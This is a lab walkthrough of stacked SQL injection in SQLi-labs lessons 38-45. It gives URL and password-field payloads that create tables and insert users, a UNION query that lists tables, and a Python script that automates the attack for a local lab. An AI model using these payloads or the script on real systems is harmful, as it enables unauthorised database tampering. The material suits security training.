Lessons 38-53 are stacked SQL injections: the injected parameter ends the original statement with a semicolon and appends statements of its own, which the application then executes as well.

SQLi-labs: Lesson 38

Originally there are four tables: emails, referers, uagents, users

If you use the following query: ?id=1'; create table test like users;--+

Let's see what happened: ?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

Result:

Your Username is : emails,referers,test,uagents,users

So a new table 'test' was created.

You can also try update, insert, drop table, etc.


SQLi-labs: Lesson 39 & 41

Insert a new user:

?id=4;insert into users(id,username,password) values('33','user33','hello!')--+

Search the new user: ?id=33

Your Username is : user33
Your Password is : hello!


SQLi-labs: Lesson 40

Insert a new user:

?id=0'); insert into users(id,username,password) values('44','user44','hello!')--+

Search the new user: ?id=44

Your Username is : user44
Your Password is : hello!


SQLi-labs: Lesson 42

In this lesson, the password field on the login page is vulnerable. So try this in the password field: c';create table xx like users;--. Then browse to another page (e.g. lesson 40) to check whether the table xx was successfully created. Note that MySQL only recognises -- as a comment when whitespace follows it (in the URL payloads above, the + supplies that space); in a form field, # is the safer terminator, which is what lesson 44 below uses.

Your Username is : emails,referers,uagents,users,xx

Succeed!


SQLi-labs: Lesson 43 & 45

For lesson 43, add a single quote to the password field, and you get the following error message:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''c'')' at line 1

So this lesson has parentheses around the parameters.

Queries are similar to previous lessons.

Lesson 45 is blind-based but uses the same payload as lesson 43.


SQLi-labs: Lesson 44

Blind-based. Try this in the password field: dd' or 1=1#. It works!

Now you can craft your query: dd';create table less44 like users;#

Check the tables again (from a non-blind lesson, as in lesson 42):

Your Username is : emails,less44,referers,uagents,users,xx

The table less44 is now in the database.
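As an added example (not part of the original write-up or of sqli-labs itself), the following Python script automates what the lessons above do by hand: send a stacked statement, then list the tables via the lesson 38 union query and diff the result against a baseline. It generalises over the three quoting contexts met above (bare number, single quote, quote plus parenthesis). The lab URL BASE_URL and the parameter name are assumptions to edit for your setup, and the sample responses are constructed so that the parsing can be tested without the lab running.

```python
import re
import urllib.parse
import urllib.request

# Constructed for this example: the lab URL is an assumption, edit it for your setup.
BASE_URL = "http://127.0.0.1/sqli-labs/Less-38/"
PARAM = "id"

# How the injected value must close the original statement before the ';'.
# These are the three contexts met in lessons 38-41 above: a bare number
# (lessons 39/41), a single-quoted string (lesson 38) and a quoted,
# parenthesised string (lesson 40).
CONTEXTS = {
    "numeric": "",    # ... WHERE id=4
    "single": "'",    # ... WHERE id='4'
    "paren": "')",    # ... WHERE id=('4')
}


def stacked_payload(context, statement, base="1", terminator="-- "):
    """Parameter value that ends the original query and stacks `statement`.

    The default terminator is dash-dash-space: MySQL only treats '--' as a
    comment when whitespace follows it, which is why the URL payloads in the
    write-up end in '--+' (the '+' decodes to a space). For a POST form field
    pass terminator='#', which needs no trailing space.
    """
    return "%s%s;%s;%s" % (base, CONTEXTS[context], statement, terminator)


def table_list_payload(context, columns=3):
    """UNION payload that lists the current database's tables in column 2,
    as the lesson 38 check above does (three columns is the lab's layout)."""
    inner = ("(select group_concat(table_name) from information_schema.tables "
             "where table_schema=database())")
    cols = ["1", inner] + [str(i) for i in range(3, columns + 1)]
    return "0%s union select %s-- " % (CONTEXTS[context], ",".join(cols))


USERNAME_RE = re.compile(r"Your Username is\s*:\s*([^<\r\n]+)")


def parse_tables(page):
    """Extract the comma-separated table list echoed in the username slot."""
    m = USERNAME_RE.search(page)
    if not m:
        return set()
    return {t.strip() for t in m.group(1).split(",") if t.strip()}


def new_tables(before_page, after_page):
    """Tables present after the stacked statement that were absent before."""
    return parse_tables(after_page) - parse_tables(before_page)


def fetch(value):
    """GET the lab page with the injectable parameter set to `value`."""
    url = BASE_URL + "?" + urllib.parse.urlencode({PARAM: value})
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample responses (what lesson 38 printed before/after the
# CREATE TABLE), so the parsing can be exercised without the lab running.
SAMPLE_BEFORE = "Your Username is : emails,referers,uagents,users"
SAMPLE_AFTER = "Your Username is : emails,referers,test,uagents,users"


def main():
    context = "single"  # lesson 38; use "numeric" for 39/41, "paren" for 40
    before = fetch(table_list_payload(context))
    fetch(stacked_payload(context, "create table test like users"))
    after = fetch(table_list_payload(context))
    print("created:", sorted(new_tables(before, after)))


if __name__ == "__main__":
    main()
```

urlencode turns the trailing space of the default terminator into the same --+ seen in the payloads above; switching the context key is all that changes between lessons 38, 39/41 and 40, which is the point of the exercise.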
